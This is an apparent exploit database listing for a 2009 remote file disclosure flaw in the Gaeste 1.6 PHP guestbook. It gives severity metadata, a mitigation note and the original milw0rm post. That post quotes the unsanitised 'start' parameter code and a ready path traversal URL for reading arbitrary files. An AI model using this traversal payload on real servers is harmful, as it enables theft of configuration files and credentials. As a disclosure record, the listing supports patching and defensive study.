Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability

vendor:

Gaeste 1.6

by:

bd0rk

7.5

CVSS

HIGH

Remote File Disclosure

200

CWE

Product Name: Gaeste 1.6

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: YES

Related CWE: N/A

CPE: a:php4scripte.de:gaeste:1.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability

Gaeste 1.6 is vulnerable to a remote file disclosure vulnerability. This vulnerability is due to insufficient sanitization of user-supplied input to the 'start' parameter in 'gastbuch.php'. An attacker can exploit this vulnerability to disclose sensitive information from arbitrary files on the vulnerable system.

Mitigation:

Upgrade to the latest version of Gaeste 1.6 or apply the patch from the vendor.

Source

Exploit-DB raw data:

               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
               +                                                                +
               + Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
               +                                                                +
               +                     bd0rk || SOH-Crew                          +
               +                                                                +
               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)

=> Vulnerable Code in gastbuch.php line 2-3

        -------------------------------
                              
           if (isset($_GET['start'])) {
           $start=$_GET['start'];

        -------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

# milw0rm.com [2009-02-09]